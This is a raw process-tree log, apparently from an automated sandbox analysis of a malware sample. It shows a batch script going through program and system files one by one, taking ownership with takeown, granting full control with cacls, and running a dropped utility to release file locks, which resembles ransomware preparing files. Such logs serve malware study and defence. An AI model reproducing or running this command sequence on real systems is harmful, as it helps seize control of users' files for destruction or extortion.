C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp""2⤵PID:1220
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp" /E /G Admin:F /C3⤵PID:1636
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp"3⤵PID:864
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "SaslPrepProfile_norm_bidi.spp" -nobanner3⤵PID:1496
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "SaslPrepProfile_norm_bidi.spp" -nobanner4⤵PID:928
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1552
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT""2⤵PID:228
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT" /E /G Admin:F /C3⤵PID:1952
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT"3⤵PID:1556
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "ROMAN.TXT" -nobanner3⤵PID:1564
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "ROMAN.TXT" -nobanner4⤵PID:2008
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:912
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT""2⤵PID:1688
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT" /E /G Admin:F /C3⤵PID:212
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT"3⤵
- Modifies file permissions
PID:1836
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "CP1257.TXT" -nobanner3⤵PID:956
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "CP1257.TXT" -nobanner4⤵PID:1908
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1680
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png""2⤵PID:1824
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png" /E /G Admin:F /C3⤵PID:1724
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1560
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "superbar.png" -nobanner3⤵PID:664
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "superbar.png" -nobanner4⤵PID:884
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:972
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml""2⤵PID:1932
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml" /E /G Admin:F /C3⤵PID:828
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:980
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "resource.xml" -nobanner3⤵PID:1556
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "resource.xml" -nobanner4⤵PID:1620
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1564
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml""2⤵PID:912
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml" /E /G Admin:F /C3⤵PID:1928
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:212
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "resource.xml" -nobanner3⤵PID:2012
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "resource.xml" -nobanner4⤵PID:1908
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1152
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml""2⤵PID:1648
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml" /E /G Admin:F /C3⤵PID:236
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1636
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "resource.xml" -nobanner3⤵PID:928
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "resource.xml" -nobanner4⤵PID:884
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1912
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files\Microsoft Games\FreeCell\FreeCellMCE.png""2⤵PID:960
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Microsoft Games\FreeCell\FreeCellMCE.png" /E /G Admin:F /C3⤵PID:240
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Microsoft Games\FreeCell\FreeCellMCE.png"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:224
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "FreeCellMCE.png" -nobanner3⤵PID:1652
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "FreeCellMCE.png" -nobanner4⤵PID:1620
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:432
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files\Microsoft Games\Hearts\HeartsMCE.png""2⤵PID:1340
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Microsoft Games\Hearts\HeartsMCE.png" /E /G Admin:F /C3⤵PID:1156
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Microsoft Games\Hearts\HeartsMCE.png"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1836
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "HeartsMCE.png" -nobanner3⤵PID:956
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "HeartsMCE.png" -nobanner4⤵PID:1908
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1680
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files\Microsoft Games\Mahjong\MahjongMCE.png""2⤵PID:892
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Microsoft Games\Mahjong\MahjongMCE.png" /E /G Admin:F /C3⤵PID:1724
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Microsoft Games\Mahjong\MahjongMCE.png"3⤵
- Modifies file permissions
PID:1572
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "MahjongMCE.png" -nobanner3⤵PID:664
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "MahjongMCE.png" -nobanner4⤵PID:884
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:972
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png""2⤵PID:768
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png" /E /G Admin:F /C3⤵PID:828
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png"3⤵
- Modifies file permissions
PID:980
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "watermark.png" -nobanner3⤵PID:224
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "watermark.png" -nobanner4⤵PID:1124
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1652
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml""2⤵PID:432
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml" /E /G Admin:F /C3⤵PID:1220
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml"3⤵
- Modifies file permissions
PID:1156
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "resource.xml" -nobanner3⤵PID:520
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "resource.xml" -nobanner4⤵PID:2012
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:804
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.exe""2⤵PID:1936
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.exe" /E /G Admin:F /C3⤵PID:1932
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.exe"3⤵PID:392
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "LogTransport2.exe" -nobanner3⤵PID:1636
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "LogTransport2.exe" -nobanner4⤵PID:1572
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:884
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\br.gif""2⤵PID:1912
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\br.gif" /E /G Admin:F /C3⤵PID:1736
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\br.gif"3⤵
- Modifies file permissions
PID:240
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "br.gif" -nobanner3⤵PID:828
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "br.gif" -nobanner4⤵PID:980
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1124
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif""2⤵PID:204
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif" /E /G Admin:F /C3⤵PID:772
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif"3⤵PID:208
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "form_responses.gif" -nobanner3⤵PID:1220
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "form_responses.gif" -nobanner4⤵PID:1156
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2012
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif""2⤵PID:1152
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif" /E /G Admin:F /C3⤵PID:1060
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif"3⤵
- Modifies file permissions
PID:236
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "review_email.gif" -nobanner3⤵PID:1932
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "review_email.gif" -nobanner4⤵PID:392
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1572
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif""2⤵PID:664
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif" /E /G Admin:F /C3⤵PID:228
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif"3⤵PID:912
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "tr.gif" -nobanner3⤵PID:1736
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "tr.gif" -nobanner4⤵PID:240
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:980
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf""2⤵PID:224
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf" /E /G Admin:F /C3⤵PID:892
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf"3⤵PID:960
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "AdobePiStd.otf" -nobanner3⤵PID:772
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "AdobePiStd.otf" -nobanner4⤵PID:208
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1156
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf""2⤵PID:520
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf" /E /G Admin:F /C3⤵PID:768
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf"3⤵PID:1552
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "MyriadPro-BoldIt.otf" -nobanner3⤵PID:1060
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "MyriadPro-BoldIt.otf" -nobanner4⤵PID:236
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:392
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt""2⤵PID:1636
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt" /E /G Admin:F /C3⤵PID:432
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt"3⤵PID:1188
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "DisplayLanguageNames.en_CA.txt" -nobanner3⤵PID:228
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "DisplayLanguageNames.en_CA.txt" -nobanner4⤵PID:912
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:240
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca""2⤵PID:828
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca" /E /G Admin:F /C3⤵PID:1680
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca"3⤵PID:1688
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "can.fca" -nobanner3⤵PID:892
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "can.fca" -nobanner4⤵PID:960
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:208
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.ths""2⤵PID:1220
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.ths" /E /G Admin:F /C3⤵PID:1912
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.ths"3⤵PID:1824
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "usa03.ths" -nobanner3⤵PID:768
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "usa03.ths" -nobanner4⤵PID:1552
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:236
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT""2⤵PID:1932
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT" /E /G Admin:F /C3⤵PID:204
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT"3⤵PID:804
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "GREEK.TXT" -nobanner3⤵PID:432
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "GREEK.TXT" -nobanner4⤵PID:1188
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:912
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT""2⤵PID:1736
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT" /E /G Admin:F /C3⤵PID:1152
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT"3⤵
- Modifies file permissions
PID:1456
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "CP1253.TXT" -nobanner3⤵PID:1680
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "CP1253.TXT" -nobanner4⤵PID:1688
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:960
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig""2⤵PID:772
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig" /E /G Admin:F /C3⤵PID:1936
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig"3⤵
- Modifies file permissions
PID:1124
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "cryptocme2.sig" -nobanner3⤵PID:1912
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "cryptocme2.sig" -nobanner4⤵PID:1824
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1552
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif""2⤵PID:1060
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif" /E /G Admin:F /C3⤵PID:1556
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif"3⤵PID:1592
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "bl.gif" -nobanner3⤵PID:204
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "bl.gif" -nobanner4⤵PID:804
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1188
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif""2⤵PID:228
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif" /E /G Admin:F /C3⤵PID:520
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif"3⤵PID:864
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "forms_super.gif" -nobanner3⤵PID:1152
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "forms_super.gif" -nobanner4⤵PID:1456
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1688
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif""2⤵PID:892
-
